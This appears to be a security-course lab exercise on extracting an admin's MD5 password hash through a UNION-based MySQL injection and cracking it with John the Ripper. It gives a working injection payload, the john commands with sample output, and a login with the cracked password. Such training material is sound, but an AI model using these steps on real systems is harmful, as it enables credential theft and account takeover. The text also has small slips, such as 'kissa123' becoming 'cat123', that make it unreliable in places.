(MySQL) UNION and breaking password hashes

Hash algorithms

Fortunately, it is now quite rare that applications store users' passwords in plain text in a database. In such a case, an attacker who manages to steal the database would have a bunch of passwords to try, for example, in users' accounts on other services (which is why passwords should not be reused).

Instead, passwords are usually "hashed", meaning they are run through a one-way hashing algorithm, such as MD5, SHA1, etc.

For example, the MD5 hash of the text "kissa123" is 13c3a117d0013ab22417c8edca354b76. The application could then save it to the user's database as follows:

Email: jaska.jokunen@example.com

PasswordHash: 13c3a117d0013ab22417c8edca354b76

When Jaska Jokunen logs in, the application verifies if MD5(Jaska's entered password) is equal to the password hash saved in the database.

An attacker, on the other hand, cannot directly change the hash 13c3a117d0013ab22417c8edca354b76 back to the form "kissa123". Hash algorithms are one-way.

However, an attacker can guess with brute force and wordlists.

• Is "pokemon" hash 13c3a117d0013ab22417c8edca354b76? No.
• Is "kitara456" hash 13c3a117d0013ab22417c8edca354b76? No.
• Is "cat123" hash 13c3a117d0013ab22417c8edca354b76? Yes.

This kind of guessing is usually called password cracking.

Obtaining the password hash of an admin user

Use the familiar and secure SQL injection vulnerability in the credit card search and retrieve the admin user's password hash. The steps are exactly the same as in the task where you retrieved the system administrator's password, except that the password was in plain text at that time. Here are the steps for refreshing your memory (all of these have been learned earlier in the course):

• Escape from the LIKE clause text and comment out the rest of the query with double dash (and space) so that the query goes through again.
• After the query, add ORDER BY 1, ORDER BY 2, etc. until you determine the number of columns returned by the query.
• Add the UNION SELECT statement with the correct number of columns. First try with NULL values and then try to find a column that is reflected in the application, i.e., a reflection point.
• Use UNION SELECT to retrieve the email and password columns from the user table. Filter the rows to only those where the value in the admin column is True.

For variation, you can return both the username and password hash together in one column, using the MySQL concat function.

Model:

UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,concat(email, ":", password),NULL FROM user WHERE admin=True

Breaking the seal

Use the John The Ripper (JTR) tool to crack the MD5 hash. Open the attacker's terminal and copy the admin user's hash into a text file named hash.txt. For example, like this:

Next, run JTR (john) with the following settings:

• Hash algorithm (--format): raw-md5
• Password list used for guessing (--wordlist): /usr/share/wordlists/rockyou.txt
• File containing the hash: hash.txt

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The output should be something like this; in this case, the password was "tucker".

Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Press 'q' or Ctrl-C to abort, almost any other key for status
tucker (?) 1g 0:00:00:00

DONE (2021-07-01 07:12) 100.0g/s 115200p/s 115200c/s 115200C/s football1..summer1

You can still execute the john --show command:

john --show --format=raw-md5 hash.txt

The command should output the password.

?:tucker 1 password hash cracked, 0 left

Log in with the previously provided email and compromised password to complete the exercise.